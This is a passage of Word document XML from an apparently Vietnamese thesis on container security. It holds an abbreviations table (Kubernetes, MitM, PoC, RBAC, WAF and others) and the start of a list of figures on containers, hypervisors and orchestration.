            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BBE73D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Chuỗi mã hóa định danh dạng JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="1820751E"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4E96229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K8s / Kube</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70B90AFC"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Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E75E7C"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Hệ điều phối Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="4A507C91"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3039D0F9"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ML / DL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3512A877"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Machine Learning / Deep Learning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D5A610"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Học máy / Học sâu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="7E3654E7"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0CC7AED4"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MitM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="638AC0EC"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Man-in-the-Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D1809A1"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Tấn công kẻ đứng giữa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="4417EC7A"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056425F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Namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E106A7C"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Linux Namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D2126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Không gian tên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="2FB92D13"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64D7EAF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OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A5E2674"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F5FB5F"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Hệ điều hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="062F6F7F"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6E030944"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PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05876DF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Proof of Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="379264B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Kịch bản thực nghiệm chứng minh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="3930BE70"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64D4FD87"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RBAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A0F0C31"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Role-Based Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E53A013" w14:textId="282E68A6"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 xml:space="preserve">Cơ chế kiểm soát truy cập </w:t>
            </w:r>
            <w:r w:rsidR="002D4461">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00864F73">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rên vai trò</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="7876D0E4" w14:textId="77777777" w:rsidTr="002D4461">
        <w:trPr>
          <w:trHeight w:val="510"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1516" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E0697BF"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SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF831AE"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Security Orchestration, Automation, and Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3596E25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Điều phối, Tự động hóa và Phản ứng an ninh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="19E73D9E"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0138A32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Syscalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D6FCD5"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System Calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76AE5B08"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Cuộc gọi hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="38D461B2"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573385AD"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VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E9C2F49"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Virtual Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78CF03DE"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Máy ảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00864F73" w:rsidRPr="00864F73" w14:paraId="5735F0A8" w14:textId="77777777" w:rsidTr="002D4461">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1516" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46B4C1DB"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WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F7DC062"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Web Application Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="364A3091" w14:textId="77777777" w:rsidR="00864F73" w:rsidRPr="00864F73" w:rsidRDefault="00864F73" w:rsidP="00864F73">
            <w:pPr>
              <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00864F73">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tường lửa bảo vệ ứng dụng Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="676E8DA5" w14:textId="1C3F2541" w:rsidR="00864F73" w:rsidRPr="00864F73" w:rsidRDefault="00864F73" w:rsidP="00864F73">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117E3DF3" w14:textId="77777777" w:rsidR="006522A9" w:rsidRDefault="00864F73" w:rsidP="00D64E0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc235976339"/>
      <w:r w:rsidR="005062A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC HÌNH VẼ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="001620D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001620D1" w:rsidRPr="001620D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Hình" </w:instrText>
      </w:r>
      <w:r w:rsidR="001620D1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B5D15" w14:textId="53D64310"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15" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.1. So sánh mô hình kiến trúc Monolithic và Microservice</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001515 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BCEC53F" w14:textId="320BFE3B"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16" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.2. Sơ lược lịch sử hình thành công nghệ Container</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001516 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0671DAD5" w14:textId="4F8B887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17" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.3. Kiến trúc tổng thể của ảo hóa VM</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001517 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58E4C1CB" w14:textId="1CB9205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18" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.4. Mô hình kiến trúc Hypervis</w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>or Type 1 và 2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001518 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AEB6D39" w14:textId="43E0DDCC"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19" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.5. Mô hình phân lớp kiến trúc Container</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001519 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14CA13CD" w14:textId="1BE35339"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0" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.6. Mô hình kiến trúc phân lớp của UFS</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001520 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27666F20" w14:textId="3FB9EE2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1" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Hình 1.7. Mô hình hoạt động của một public </w:t>
        </w:r>
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>registry</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001521 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FC1D553" w14:textId="7C02DCC7"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2" w:history="1">
        <w:r w:rsidRPr="00A25CB6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.8. Cách hoạt động của các trình điều phối</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc236001522 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00835A55">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
